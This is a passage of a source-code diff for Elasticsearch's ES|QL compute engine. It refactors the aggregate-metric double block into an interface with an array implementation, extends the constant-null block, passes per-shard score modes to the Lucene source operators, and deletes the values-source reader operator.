positions) { - AggregateMetricDoubleBlock result = null; - DoubleBlock newMinBlock = null; - DoubleBlock newMaxBlock = null; - DoubleBlock newSumBlock = null; - IntBlock newCountBlock = null; - try { - newMinBlock = minBlock.filter(positions); - newMaxBlock = maxBlock.filter(positions); - newSumBlock = sumBlock.filter(positions); - newCountBlock = countBlock.filter(positions); - result = new AggregateMetricDoubleBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); - return result; - } finally { - if (result == null) { - Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); - } - } - } - - @Override - public Block keepMask(BooleanVector mask) { - AggregateMetricDoubleBlock result = null; - DoubleBlock newMinBlock = null; - DoubleBlock newMaxBlock = null; - DoubleBlock newSumBlock = null; - IntBlock newCountBlock = null; - try { - newMinBlock = minBlock.keepMask(mask); - newMaxBlock = maxBlock.keepMask(mask); - newSumBlock = sumBlock.keepMask(mask); - newCountBlock = countBlock.keepMask(mask); - result = new AggregateMetricDoubleBlock(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); - return result; - } finally { - if (result == null) { - Releasables.close(newMinBlock, newMaxBlock, newSumBlock, newCountBlock); + for (var doubleMetric : List.of( + AggregateMetricDoubleBlockBuilder.Metric.MIN, + AggregateMetricDoubleBlockBuilder.Metric.MAX, + AggregateMetricDoubleBlockBuilder.Metric.SUM + )) { + DoubleBlock doubleBlock1 = (DoubleBlock) block1.getMetricBlock(doubleMetric.getIndex()); + DoubleBlock doubleBlock2 = (DoubleBlock) block2.getMetricBlock(doubleMetric.getIndex()); + if (DoubleBlock.equals(doubleBlock1, doubleBlock2) == false) { + return false; } } - } - - @Override - public ReleasableIterator lookup(IntBlock positions, ByteSizeValue targetBlockSize) { - // TODO: support - throw new UnsupportedOperationException("can't lookup values from AggregateMetricDoubleBlock"); - } - - @Override - public MvOrdering mvOrdering() { - // TODO: determine based on sub-blocks - return MvOrdering.UNORDERED; - } - - @Override - public Block expand() { - // TODO: support - throw new UnsupportedOperationException("AggregateMetricDoubleBlock"); - } - - @Override - public void writeTo(StreamOutput out) throws IOException { - for (Block block : List.of(minBlock, maxBlock, sumBlock, countBlock)) { - block.writeTo(out); - } - } - - public static Block readFrom(StreamInput in) throws IOException { - boolean success = false; - DoubleBlock minBlock = null; - DoubleBlock maxBlock = null; - DoubleBlock sumBlock = null; - IntBlock countBlock = null; - BlockStreamInput blockStreamInput = (BlockStreamInput) in; - try { - minBlock = DoubleBlock.readFrom(blockStreamInput); - maxBlock = DoubleBlock.readFrom(blockStreamInput); - sumBlock = DoubleBlock.readFrom(blockStreamInput); - countBlock = IntBlock.readFrom(blockStreamInput); - AggregateMetricDoubleBlock result = new AggregateMetricDoubleBlock(minBlock, maxBlock, sumBlock, countBlock); - success = true; - return result; - } finally { - if (success == false) { - Releasables.close(minBlock, maxBlock, sumBlock, countBlock); + IntBlock intBlock1 = block1.countBlock(); + IntBlock intBlock2 = block2.countBlock(); + return IntBlock.equals(intBlock1, intBlock2); + } + + static int hash(AggregateMetricDoubleBlock block) { + final int positions = block.getPositionCount(); + int result = 1; + for (int pos = 0; pos < positions; pos++) { + if (block.isNull(pos)) { + result = 31 * result - 1; + } else { + final int valueCount = 
block.getValueCount(pos); + result = 31 * result + valueCount; + final int firstValueIdx = block.getFirstValueIndex(pos); + for (int valueIndex = 0; valueIndex < valueCount; valueIndex++) { + for (DoubleBlock b : List.of(block.minBlock(), block.maxBlock(), block.sumBlock())) { + result *= 31; + result += b.isNull(firstValueIdx + valueIndex) ? -1 : Double.hashCode(b.getDouble(firstValueIdx + valueIndex)); + } + result *= 31; + result += block.countBlock().isNull(firstValueIdx + valueIndex) + ? -1 + : block.countBlock().getInt(firstValueIdx + valueIndex); + } } } + return result; } - @Override - public long ramBytesUsed() { - return minBlock.ramBytesUsed() + maxBlock.ramBytesUsed() + sumBlock.ramBytesUsed() + countBlock.ramBytesUsed(); - } + DoubleBlock minBlock(); - @Override - public boolean equals(Object o) { - if (this == o) return true; - if (o == null || getClass() != o.getClass()) return false; - AggregateMetricDoubleBlock that = (AggregateMetricDoubleBlock) o; - return positionCount == that.positionCount - && minBlock.equals(that.minBlock) - && maxBlock.equals(that.maxBlock) - && sumBlock.equals(that.sumBlock) - && countBlock.equals(that.countBlock); - } + DoubleBlock maxBlock(); - @Override - public int hashCode() { - return Objects.hash( - DoubleBlock.hash(minBlock), - DoubleBlock.hash(maxBlock), - DoubleBlock.hash(sumBlock), - IntBlock.hash(countBlock), - positionCount - ); - } + DoubleBlock sumBlock(); - public DoubleBlock minBlock() { - return minBlock; - } + IntBlock countBlock(); - public DoubleBlock maxBlock() { - return maxBlock; - } - - public DoubleBlock sumBlock() { - return sumBlock; - } - - public IntBlock countBlock() { - return countBlock; - } - - public Block getMetricBlock(int index) { - if (index == AggregateMetricDoubleBlockBuilder.Metric.MIN.getIndex()) { - return minBlock; - } - if (index == AggregateMetricDoubleBlockBuilder.Metric.MAX.getIndex()) { - return maxBlock; - } - if (index == AggregateMetricDoubleBlockBuilder.Metric.SUM.getIndex()) { - return sumBlock; - } - if (index == AggregateMetricDoubleBlockBuilder.Metric.COUNT.getIndex()) { - return countBlock; - } - throw new UnsupportedOperationException("Received an index (" + index + ") outside of range for AggregateMetricDoubleBlock."); - } + Block getMetricBlock(int index); } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java index 90e57d87fcd0c..3d1564d93af56 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/AggregateMetricDoubleBlockBuilder.java @@ -59,7 +59,7 @@ protected int elementSize() { } @Override - public Block.Builder copyFrom(Block b, int beginInclusive, int endExclusive) { + public AggregateMetricDoubleBlockBuilder copyFrom(Block b, int beginInclusive, int endExclusive) { Block minBlock; Block maxBlock; Block sumBlock; @@ -84,7 +84,7 @@ public Block.Builder copyFrom(Block b, int beginInclusive, int endExclusive) { } @Override - public AbstractBlockBuilder appendNull() { + public AggregateMetricDoubleBlockBuilder appendNull() { minBuilder.appendNull(); maxBuilder.appendNull(); sumBuilder.appendNull(); @@ -93,7 +93,7 @@ public AbstractBlockBuilder appendNull() { } @Override - public Block.Builder mvOrdering(Block.MvOrdering mvOrdering) { + public 
AggregateMetricDoubleBlockBuilder mvOrdering(Block.MvOrdering mvOrdering) { minBuilder.mvOrdering(mvOrdering); maxBuilder.mvOrdering(mvOrdering); sumBuilder.mvOrdering(mvOrdering); @@ -102,7 +102,7 @@ public Block.Builder mvOrdering(Block.MvOrdering mvOrdering) { } @Override - public Block build() { + public AggregateMetricDoubleBlock build() { DoubleBlock minBlock = null; DoubleBlock maxBlock = null; DoubleBlock sumBlock = null; @@ -114,7 +114,7 @@ public Block build() { maxBlock = maxBuilder.build(); sumBlock = sumBuilder.build(); countBlock = countBuilder.build(); - AggregateMetricDoubleBlock block = new AggregateMetricDoubleBlock(minBlock, maxBlock, sumBlock, countBlock); + AggregateMetricDoubleBlock block = new AggregateMetricDoubleArrayBlock(minBlock, maxBlock, sumBlock, countBlock); success = true; return block; } finally { @@ -174,9 +174,9 @@ public String getLabel() { public record AggregateMetricDoubleLiteral(Double min, Double max, Double sum, Integer count) implements GenericNamedWriteable { public AggregateMetricDoubleLiteral { - min = min.isNaN() ? null : min; - max = max.isNaN() ? null : max; - sum = sum.isNaN() ? null : sum; + min = (min == null || min.isNaN()) ? null : min; + max = (max == null || max.isNaN()) ? null : max; + sum = (sum == null || sum.isNaN()) ? null : sum; } public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java index bc8b31bc565df..c05d54d4e3c96 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/Block.java @@ -345,7 +345,7 @@ static Block[] buildAll(Block.Builder... 
builders) { * This should be paired with {@link #readTypedBlock(BlockStreamInput)} */ static void writeTypedBlock(Block block, StreamOutput out) throws IOException { - if (false == supportsAggregateMetricDoubleBlock(out.getTransportVersion()) && block instanceof AggregateMetricDoubleBlock a) { + if (false == supportsAggregateMetricDoubleBlock(out.getTransportVersion()) && block instanceof AggregateMetricDoubleArrayBlock a) { block = a.asCompositeBlock(); } block.elementType().writeTo(out); @@ -360,7 +360,7 @@ static Block readTypedBlock(BlockStreamInput in) throws IOException { ElementType elementType = ElementType.readFrom(in); Block block = elementType.reader.readBlock(in); if (false == supportsAggregateMetricDoubleBlock(in.getTransportVersion()) && block instanceof CompositeBlock compositeBlock) { - block = AggregateMetricDoubleBlock.fromCompositeBlock(compositeBlock); + block = AggregateMetricDoubleArrayBlock.fromCompositeBlock(compositeBlock); } return block; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java index 55053f509591d..9e730004ab9f9 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/BlockFactory.java @@ -436,7 +436,7 @@ public AggregateMetricDoubleBlockBuilder newAggregateMetricDoubleBlockBuilder(in return new AggregateMetricDoubleBlockBuilder(estimatedSize, this); } - public final Block newConstantAggregateMetricDoubleBlock( + public final AggregateMetricDoubleBlock newConstantAggregateMetricDoubleBlock( AggregateMetricDoubleBlockBuilder.AggregateMetricDoubleLiteral value, int positions ) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java index 2ed905f4299ca..16242d6fb8050 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ConstantNullBlock.java @@ -14,7 +14,6 @@ import org.elasticsearch.core.ReleasableIterator; import java.io.IOException; -import java.util.Objects; /** * Block implementation representing a constant null value. 
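A minimal, self-contained sketch of the wire-compatibility round-trip that the writeTypedBlock/readTypedBlock hunks above perform: peers on older transport versions only understand CompositeBlock, so the new array block is downgraded before serialization and re-wrapped after deserialization. These are stand-in types, not the real Block/StreamOutput API:

    // Illustrative stand-ins for AggregateMetricDoubleArrayBlock and CompositeBlock.
    interface WireBlock {}

    record LegacyComposite(double[] min, double[] max, double[] sum, int[] count) implements WireBlock {}

    record AggregateArray(double[] min, double[] max, double[] sum, int[] count) implements WireBlock {
        LegacyComposite asComposite() { return new LegacyComposite(min, max, sum, count); }
        static AggregateArray fromComposite(LegacyComposite c) {
            return new AggregateArray(c.min(), c.max(), c.sum(), c.count());
        }
    }

    final class WireCompat {
        // Mirrors writeTypedBlock: downgrade only when the peer is too old.
        static WireBlock toWire(WireBlock b, boolean peerSupportsAggregate) {
            return (peerSupportsAggregate == false && b instanceof AggregateArray a) ? a.asComposite() : b;
        }

        // Mirrors readTypedBlock: re-wrap the composite an old peer sent.
        static WireBlock fromWire(WireBlock b, boolean peerSupportsAggregate) {
            return (peerSupportsAggregate == false && b instanceof LegacyComposite c) ? AggregateArray.fromComposite(c) : b;
        }
    }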
@@ -26,7 +25,8 @@ public final class ConstantNullBlock extends AbstractNonThreadSafeRefCounted LongBlock, FloatBlock, DoubleBlock, - BytesRefBlock { + BytesRefBlock, + AggregateMetricDoubleBlock { private static final long BASE_RAM_BYTES_USED = RamUsageEstimator.shallowSizeOfInstance(ConstantNullBlock.class); private final int positionCount; @@ -120,15 +120,53 @@ public long ramBytesUsed() { @Override public boolean equals(Object obj) { - if (obj instanceof ConstantNullBlock that) { - return this.getPositionCount() == that.getPositionCount(); + if (obj instanceof Block that) { + return this.getPositionCount() == 0 && that.getPositionCount() == 0 + || this.getPositionCount() == that.getPositionCount() && that.areAllValuesNull(); + } + if (obj instanceof Vector that) { + return this.getPositionCount() == 0 && that.getPositionCount() == 0; } return false; } @Override public int hashCode() { - return Objects.hash(getPositionCount()); + // The hashcode for ConstantNullBlock is calculated in this way so that + // we return the same hashcode for ConstantNullBlock as we would for block + // types that ConstantNullBlock implements that contain only null values. + // Example: a DoubleBlock with 8 positions that are all null will return + // the same hashcode as a ConstantNullBlock with a positionCount of 8. + int result = 1; + for (int pos = 0; pos < positionCount; pos++) { + result = 31 * result - 1; + } + return result; + } + + @Override + public DoubleBlock minBlock() { + return this; + } + + @Override + public DoubleBlock maxBlock() { + return this; + } + + @Override + public DoubleBlock sumBlock() { + return this; + } + + @Override + public IntBlock countBlock() { + return this; + } + + @Override + public Block getMetricBlock(int index) { + return this; } @Override diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java index 20ca4ed70e3f8..ccd0f82343401 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/DocVector.java @@ -138,7 +138,6 @@ private boolean checkIfSingleSegmentNonDecreasing() { prev = v; } return true; - } /** diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java index 64fc0d2bdd263..e651a65cf69b2 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/data/ElementType.java @@ -63,7 +63,7 @@ public enum ElementType { 10, "AggregateMetricDouble", BlockFactory::newAggregateMetricDoubleBlockBuilder, - AggregateMetricDoubleBlock::readFrom + AggregateMetricDoubleArrayBlock::readFrom ); private interface BuilderSupplier { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java index 626f0b00f0e2c..cded3a3494738 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneCountOperator.java @@ -58,7 +58,7 @@ public Factory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + 
shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.shardRefCounters = contexts; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java index 82d766349ce9e..7e0003efaf669 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMaxFactory.java @@ -129,7 +129,7 @@ public LuceneMaxFactory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.contexts = contexts; this.fieldName = fieldName; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java index 505e5cd3f0d75..000ade1b19562 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneMinFactory.java @@ -130,7 +130,7 @@ public LuceneMinFactory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.shardRefCounters = contexts; this.fieldName = fieldName; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java index 366715530f665..f3eec4147f237 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneOperator.java @@ -112,11 +112,18 @@ protected Factory( int taskConcurrency, int limit, boolean needsScore, - ScoreMode scoreMode + Function scoreModeFunction ) { this.limit = limit; this.dataPartitioning = dataPartitioning; - this.sliceQueue = LuceneSliceQueue.create(contexts, queryFunction, dataPartitioning, autoStrategy, taskConcurrency, scoreMode); + this.sliceQueue = LuceneSliceQueue.create( + contexts, + queryFunction, + dataPartitioning, + autoStrategy, + taskConcurrency, + scoreModeFunction + ); this.taskConcurrency = Math.min(sliceQueue.totalSlices(), taskConcurrency); this.needsScore = needsScore; } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java index 73eae67819907..0e2b020e2fb57 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneQueryExpressionEvaluator.java @@ -10,6 +10,7 @@ import org.apache.lucene.search.Query; import org.apache.lucene.search.Scorable; import org.apache.lucene.search.ScoreMode; +import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.compute.data.Block; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.BooleanVector; @@ -29,6 +30,7 @@ public class LuceneQueryExpressionEvaluator extends LuceneQueryEvaluator implements EvalOperator.ExpressionEvaluator { + private static final long BASE_RAM_BYTES_USED = 
RamUsageEstimator.shallowSizeOfInstance(LuceneQueryExpressionEvaluator.class); LuceneQueryExpressionEvaluator(BlockFactory blockFactory, ShardConfig[] shards) { super(blockFactory, shards); @@ -64,6 +66,11 @@ protected void appendMatch(BooleanVector.Builder builder, Scorable scorer) throw builder.appendBoolean(true); } + @Override + public long baseRamBytesUsed() { + return BASE_RAM_BYTES_USED; + } + public record Factory(ShardConfig[] shardConfigs) implements EvalOperator.ExpressionEvaluator.Factory { @Override public EvalOperator.ExpressionEvaluator get(DriverContext context) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java index ee9f217303195..1a0b349b45f3f 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSliceQueue.java @@ -112,12 +112,14 @@ public static LuceneSliceQueue create( DataPartitioning dataPartitioning, Function autoStrategy, int taskConcurrency, - ScoreMode scoreMode + Function scoreModeFunction ) { List slices = new ArrayList<>(); Map partitioningStrategies = new HashMap<>(contexts.size()); + for (ShardContext ctx : contexts) { for (QueryAndTags queryAndExtra : queryFunction.apply(ctx)) { + var scoreMode = scoreModeFunction.apply(ctx); Query query = queryAndExtra.query; query = scoreMode.needsScores() ? query : new ConstantScoreQuery(query); /* diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java index 9fedc595641b4..5201eede502df 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneSourceOperator.java @@ -81,7 +81,7 @@ public Factory( taskConcurrency, limit, needsScore, - needsScore ? COMPLETE : COMPLETE_NO_SCORES + shardContext -> needsScore ? 
COMPLETE : COMPLETE_NO_SCORES ); this.contexts = contexts; this.maxPageSize = maxPageSize; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java index d93a5493a3aba..553b4319f22e9 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/LuceneTopNSourceOperator.java @@ -12,14 +12,13 @@ import org.apache.lucene.search.CollectionTerminatedException; import org.apache.lucene.search.FieldDoc; import org.apache.lucene.search.LeafCollector; -import org.apache.lucene.search.Query; import org.apache.lucene.search.ScoreDoc; +import org.apache.lucene.search.ScoreMode; import org.apache.lucene.search.Sort; import org.apache.lucene.search.SortField; import org.apache.lucene.search.TopDocsCollector; import org.apache.lucene.search.TopFieldCollectorManager; import org.apache.lucene.search.TopScoreDocCollectorManager; -import org.apache.lucene.search.Weight; import org.elasticsearch.common.Strings; import org.elasticsearch.compute.data.BlockFactory; import org.elasticsearch.compute.data.DocBlock; @@ -44,9 +43,6 @@ import java.util.function.Function; import java.util.stream.Collectors; -import static org.apache.lucene.search.ScoreMode.TOP_DOCS; -import static org.apache.lucene.search.ScoreMode.TOP_DOCS_WITH_SCORES; - /** * Source operator that builds Pages out of the output of a TopFieldCollector (aka TopN) */ @@ -75,7 +71,7 @@ public Factory( taskConcurrency, limit, needsScore, - needsScore ? TOP_DOCS_WITH_SCORES : TOP_DOCS + scoreModeFunction(sorts, needsScore) ); this.contexts = contexts; this.maxPageSize = maxPageSize; @@ -331,18 +327,11 @@ static final class ScoringPerShardCollector extends PerShardCollector { } } - private static Function weightFunction( - Function queryFunction, - List> sorts, - boolean needsScore - ) { + private static Function scoreModeFunction(List> sorts, boolean needsScore) { return ctx -> { - final var query = queryFunction.apply(ctx); - final var searcher = ctx.searcher(); try { // we create a collector with a limit of 1 to determine the appropriate score mode to use. 
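The hunks above replace a fixed ScoreMode with a per-shard supplier; the generic type parameters appear to have been stripped from this diff by extraction, so the sketch below assumes the signature is Function<ShardContext, ScoreMode>. Stand-in types keep it self-contained:

    import java.util.List;
    import java.util.function.Function;

    enum ScoreModeSketch { COMPLETE, COMPLETE_NO_SCORES }

    record ShardCtx(String index) {}

    class SliceQueueSketch {
        // Each shard now picks its own score mode; a TopN factory can derive it
        // from a throwaway per-shard collector, as in the hunk above.
        static void create(List<ShardCtx> shards, Function<ShardCtx, ScoreModeSketch> scoreModeFunction) {
            for (ShardCtx ctx : shards) {
                ScoreModeSketch scoreMode = scoreModeFunction.apply(ctx); // per shard, not global
                System.out.println(ctx.index() + " -> " + scoreMode);
            }
        }

        public static void main(String[] args) {
            boolean needsScore = false;
            create(
                List.of(new ShardCtx("logs-0"), new ShardCtx("logs-1")),
                ctx -> needsScore ? ScoreModeSketch.COMPLETE : ScoreModeSketch.COMPLETE_NO_SCORES
            );
        }
    }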
- var scoreMode = newPerShardCollector(ctx, sorts, needsScore, 1).collector.scoreMode(); - return searcher.createWeight(searcher.rewrite(query), scoreMode, 1); + return newPerShardCollector(ctx, sorts, needsScore, 1).collector.scoreMode(); } catch (IOException e) { throw new UncheckedIOException(e); } diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java index 97286761b7bcf..bb1d889db3f85 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/TimeSeriesSourceOperatorFactory.java @@ -45,7 +45,7 @@ private TimeSeriesSourceOperatorFactory( taskConcurrency, limit, false, - ScoreMode.COMPLETE_NO_SCORES + shardContext -> ScoreMode.COMPLETE_NO_SCORES ); this.contexts = contexts; this.maxPageSize = maxPageSize; diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperator.java deleted file mode 100644 index 500bef6d2a597..0000000000000 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/ValuesSourceReaderOperator.java +++ /dev/null @@ -1,792 +0,0 @@ -/* - * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one - * or more contributor license agreements. Licensed under the Elastic License - * 2.0; you may not use this file except in compliance with the Elastic License - * 2.0. - */ - -package org.elasticsearch.compute.lucene; - -import org.apache.lucene.index.IndexReader; -import org.apache.lucene.index.LeafReaderContext; -import org.apache.lucene.index.SortedDocValues; -import org.apache.lucene.util.BytesRef; -import org.elasticsearch.TransportVersion; -import org.elasticsearch.common.Strings; -import org.elasticsearch.common.io.stream.NamedWriteableRegistry; -import org.elasticsearch.common.io.stream.StreamInput; -import org.elasticsearch.common.io.stream.StreamOutput; -import org.elasticsearch.compute.data.Block; -import org.elasticsearch.compute.data.BlockFactory; -import org.elasticsearch.compute.data.BytesRefBlock; -import org.elasticsearch.compute.data.DocBlock; -import org.elasticsearch.compute.data.DocVector; -import org.elasticsearch.compute.data.ElementType; -import org.elasticsearch.compute.data.IntVector; -import org.elasticsearch.compute.data.Page; -import org.elasticsearch.compute.data.SingletonOrdinalsBuilder; -import org.elasticsearch.compute.operator.AbstractPageMappingOperator; -import org.elasticsearch.compute.operator.DriverContext; -import org.elasticsearch.compute.operator.Operator; -import org.elasticsearch.core.Releasable; -import org.elasticsearch.core.Releasables; -import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; -import org.elasticsearch.index.mapper.BlockLoader; -import org.elasticsearch.index.mapper.BlockLoaderStoredFieldsFromLeafLoader; -import org.elasticsearch.index.mapper.SourceLoader; -import org.elasticsearch.search.fetch.StoredFieldsSpec; -import org.elasticsearch.xcontent.XContentBuilder; - -import java.io.IOException; -import java.io.UncheckedIOException; -import java.util.ArrayList; -import java.util.List; -import java.util.Map; -import java.util.Objects; -import java.util.TreeMap; -import 
java.util.function.IntFunction; -import java.util.function.Supplier; - -import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED; -import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19; - -/** - * Operator that extracts doc_values from a Lucene index out of pages that have been produced by {@link LuceneSourceOperator} - * and outputs them to a new column. - */ -public class ValuesSourceReaderOperator extends AbstractPageMappingOperator { - /** - * Minimum number of documents for which it is more efficient to use a - * sequential stored field reader when reading stored fields. - *
- * The sequential stored field reader decompresses a whole block of docs - * at a time so for very short lists it won't be faster to use it. We use - * {@code 10} documents as the boundary for "very short" because it's what - * search does, not because we've done extensive testing on the number. - *
- */ - static final int SEQUENTIAL_BOUNDARY = 10; - - /** - * Creates a factory for {@link ValuesSourceReaderOperator}. - * @param fields fields to load - * @param shardContexts per-shard loading information - * @param docChannel the channel containing the shard, leaf/segment and doc id - */ - public record Factory(List fields, List shardContexts, int docChannel) implements OperatorFactory { - @Override - public Operator get(DriverContext driverContext) { - return new ValuesSourceReaderOperator(driverContext.blockFactory(), fields, shardContexts, docChannel); - } - - @Override - public String describe() { - StringBuilder sb = new StringBuilder(); - sb.append("ValuesSourceReaderOperator[fields = ["); - if (fields.size() < 10) { - boolean first = true; - for (FieldInfo f : fields) { - if (first) { - first = false; - } else { - sb.append(", "); - } - sb.append(f.name); - } - } else { - sb.append(fields.size()).append(" fields"); - } - return sb.append("]]").toString(); - } - } - - /** - * Configuration for a field to load. - * - * {@code blockLoader} maps shard index to the {@link BlockLoader}s - * which load the actual blocks. - */ - public record FieldInfo(String name, ElementType type, IntFunction blockLoader) {} - - public record ShardContext(IndexReader reader, Supplier newSourceLoader, double storedFieldsSequentialProportion) {} - - private final FieldWork[] fields; - private final List shardContexts; - private final int docChannel; - private final BlockFactory blockFactory; - - private final Map readersBuilt = new TreeMap<>(); - private long valuesLoaded; - - int lastShard = -1; - int lastSegment = -1; - - /** - * Creates a new extractor - * @param fields fields to load - * @param docChannel the channel containing the shard, leaf/segment and doc id - */ - public ValuesSourceReaderOperator(BlockFactory blockFactory, List fields, List shardContexts, int docChannel) { - this.fields = fields.stream().map(f -> new FieldWork(f)).toArray(FieldWork[]::new); - this.shardContexts = shardContexts; - this.docChannel = docChannel; - this.blockFactory = blockFactory; - } - - @Override - protected Page process(Page page) { - DocVector docVector = page.getBlock(docChannel).asVector(); - - Block[] blocks = new Block[fields.length]; - boolean success = false; - try { - if (docVector.singleSegmentNonDecreasing()) { - IntVector docs = docVector.docs(); - int shard = docVector.shards().getInt(0); - int segment = docVector.segments().getInt(0); - loadFromSingleLeaf(blocks, shard, segment, new BlockLoader.Docs() { - @Override - public int count() { - return docs.getPositionCount(); - } - - @Override - public int get(int i) { - return docs.getInt(i); - } - }); - } else if (docVector.singleSegment()) { - loadFromSingleLeafUnsorted(blocks, docVector); - } else { - try (LoadFromMany many = new LoadFromMany(blocks, docVector)) { - many.run(); - } - } - success = true; - for 